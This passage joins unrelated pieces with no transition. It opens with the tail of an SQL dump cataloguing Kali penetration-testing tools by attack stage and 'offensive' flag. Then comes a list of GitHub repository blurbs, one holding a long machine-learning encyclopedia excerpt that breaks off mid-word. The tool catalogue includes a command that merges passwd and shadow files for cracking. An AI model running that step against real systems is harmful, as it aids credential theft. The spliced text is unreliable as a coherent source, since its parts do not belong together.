Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
nasa / ProgpyThe NASA Prognostic Python Packages is a Python framework focused on defining and building models and algorit for prognostics (computation of remaining useful life) of engineering systems, and provides a set of models and algorithms for select components developed within this framework, suitable for use in prognostic applications.
Chinmay2660 / DSA By Abdul BariThis repository contains implementations of popular data structures and algorithms in C++ based on the teachings of Abdul Bari, an expert in the field of computer science and engineering. The implementations are meant to serve as a reference for those looking to improve their understanding of data structures and algorithms.
SajadAHMAD1 / Chaotic GSA For Engineering Design ProblemsAll nature-inspired algorithms involve two processes namely exploration and exploitation. For getting optimal performance, there should be a proper balance between these processes. Further, the majority of the optimization algorithms suffer from local minima entrapment problem and slow convergence speed. To alleviate these problems, researchers are now using chaotic maps. The Chaotic Gravitational Search Algorithm (CGSA) is a physics-based heuristic algorithm inspired by Newton's gravity principle and laws of motion. It uses 10 chaotic maps for global search and fast convergence speed. Basically, in GSA gravitational constant (G) is utilized for adaptive learning of the agents. For increasing the learning speed of the agents, chaotic maps are added to gravitational constant. The practical applicability of CGSA has been accessed through by applying it to nine Mechanical and Civil engineering design problems which include Welded Beam Design (WBD), Compression Spring Design (CSD), Pressure Vessel Design (PVD), Speed Reducer Design (SRD), Gear Train Design (GTD), Three Bar Truss (TBT), Stepped Cantilever Beam design (SCBD), Multiple Disc Clutch Brake Design (MDCBD), and Hydrodynamic Thrust Bearing Design (HTBD). The CGSA has been compared with seven state of the art stochastic algorithms particularly Constriction Coefficient based Particle Swarm Optimization and Gravitational Search Algorithm (CPSOGSA), Standard Gravitational Search Algorithm (GSA), Classical Particle Swarm Optimization (PSO), Biogeography Based Optimization (BBO), Continuous Genetic Algorithm (GA), Differential Evolution (DE), and Ant Colony Optimization (ACO). The experimental results indicate that CGSA shows efficient performance as compared to other seven participating algorithms.
sangaline / Reverse Engineering The Hacker News Ranking AlgorithmAn analysis of historical Hacker News data to determine the ranking algorithm
StephanRhode / Py Algorithms 4 Automotive EngineeringThis repository contains jupyter notebooks and python code for KIT course: Python Algorithms for Automotive Engineering
Aryia-Behroziuan / NeuronsAn ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition.[68] Decision trees Main article: Decision tree learning Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision making. Support vector machines Main article: Support vector machines Support vector machines (SVMs), also known as support vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category or the other.[69] An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Illustration of linear regression on a data set. Regression analysis Main article: Regression analysis Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization (mathematics) methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel[70]), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. Bayesian networks Main article: Bayesian network A simple Bayesian network. Rain influences whether the sprinkler is activated, and both rain and the sprinkler influence whether the grass is wet. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. Genetic algorithms Main article: Genetic algorithm A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s.[71][72] Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms.[73] Training models Usually, machine learning models require a lot of data in order for them to perform well. Usually, when training a machine learning model, one needs to collect a large, representative sample of data from a training set. Data from the training set can be as varied as a corpus of text, a collection of images, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Federated learning Main article: Federated learning Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google.[74] Applications There are many applications for machine learning, including: Agriculture Anatomy Adaptive websites Affective computing Banking Bioinformatics Brain–machine interfaces Cheminformatics Citizen science Computer networks Computer vision Credit-card fraud detection Data quality DNA sequence classification Economics Financial market analysis[75] General game playing Handwriting recognition Information retrieval Insurance Internet fraud detection Linguistics Machine learning control Machine perception Machine translation Marketing Medical diagnosis Natural language processing Natural language understanding Online advertising Optimization Recommender systems Robot locomotion Search engines Sentiment analysis Sequence mining Software engineering Speech recognition Structural health monitoring Syntactic pattern recognition Telecommunication Theorem proving Time series forecasting User behavior analytics In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million.[76] Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.[77] In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis.[78] In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software.[79] In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists.[80] In 2019 Springer Nature published the first research book created using machine learning.[81] Limitations Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results.[82][83][84] Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems.[85] In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision.[86] Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested.[87][88] Bias Main article: Algorithmic bias Machine learning approaches in particular can suffer from different data biases. A machine learning system trained on current customers only may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on man-made data, machine learning is likely to pick up the same constitutional and unconscious biases already present in society.[89] Language models learned from data have been shown to contain human-like biases.[90][91] Machine learning systems used for criminal risk assessment have been found to be biased against black people.[92][93] In 2015, Google photos would often tag black people as gorillas,[94] and in 2018 this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data, and thus was not able to recognize real gorillas at all.[95] Similar issues with recognizing non-white people have been found in many other systems.[96] In 2016, Microsoft tested a chatbot that learned from Twitter, and it quickly picked up racist and sexist language.[97] Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains.[98] Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "There’s nothing artificial about AI...It’s inspired by people, it’s created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility.”[99] Model assessments Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2/3 training set and 1/3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy.[100] In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC).[101] Ethics Machine learning poses a host of ethical questions. Systems which are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices.[102] For example, using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants against similarity to previous successful applicants.[103][104] Responsible collection of data and documentation of algorithmic rules used by a system thus is a critical part of machine learning. Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases.[105][106] Other forms of ethical challenges, not related to personal biases, are more seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is huge potential for machine learning in health care to provide professionals a great tool to diagnose, medicate, and even plan recovery paths for patients, but this will not happen until the personal biases mentioned previously, and these "greed" biases are addressed.[107] Hardware Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of non-linear hidden units.[108] By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI.[109] OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months.[110][111] Software Software suites containing a variety of machine learning algorithms include the following: Free and open-source so